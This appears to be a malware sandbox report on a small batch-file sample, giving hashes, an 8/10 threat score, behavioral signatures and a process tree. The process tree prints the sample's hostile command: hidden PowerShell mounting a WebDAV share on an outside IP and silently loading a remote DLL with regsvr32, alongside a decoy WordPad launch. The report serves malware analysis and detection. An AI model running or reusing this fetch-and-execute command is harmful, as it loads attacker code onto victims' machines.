Analysis
-
max time kernel
122s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
19/07/2024, 12:20
Static task
static1
Behavioral task
behavioral1
Sample
16877286262575524007.bat
Resource
win7-20240708-en
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
16877286262575524007.bat
Resource
win10v2004-20240704-en
8 signatures
150 seconds
General
-
Target
16877286262575524007.bat
-
Size
2KB
-
MD5
8b14065a4de48df669aca445286310f2
-
SHA1
c3f9980c9e028a04a1668c7a77c948053f9e9c08
-
SHA256
02d55e130d3c751d5f4b5759226b2117bcbafd7870f0e3a1b3e1d3b18ccf7224
-
SHA512
4b33a492a464a9c2164eb84fe2149a0d086f3b6d6a1b75e4b5c90bd5c29be179453e2a96227c6c1117f283e5312faea5252b0ffc0e3380a1494717c912c42e09
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 620 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 620 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 620 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2424 wordpad.exe 2424 wordpad.exe 2424 wordpad.exe 2424 wordpad.exe 2424 wordpad.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 3028 wrote to memory of 2424 3028 cmd.exe 31 PID 3028 wrote to memory of 2424 3028 cmd.exe 31 PID 3028 wrote to memory of 2424 3028 cmd.exe 31 PID 3028 wrote to memory of 620 3028 cmd.exe 32 PID 3028 wrote to memory of 620 3028 cmd.exe 32 PID 3028 wrote to memory of 620 3028 cmd.exe 32 PID 620 wrote to memory of 2832 620 powershell.exe 34 PID 620 wrote to memory of 2832 620 powershell.exe 34 PID 620 wrote to memory of 2832 620 powershell.exe 34 PID 620 wrote to memory of 2856 620 powershell.exe 35 PID 620 wrote to memory of 2856 620 powershell.exe 35 PID 620 wrote to memory of 2856 620 powershell.exe 35 PID 620 wrote to memory of 2856 620 powershell.exe 35 PID 620 wrote to memory of 2856 620 powershell.exe 35
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\16877286262575524007.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:2424
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.36@8888\davwwwroot\ ; regsvr32 /s \\45.9.74.36@8888\davwwwroot\283021131822935.dll2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:620 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.36@8888\davwwwroot\3⤵PID:2832
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\45.9.74.36@8888\davwwwroot\283021131822935.dll3⤵PID:2856
-
-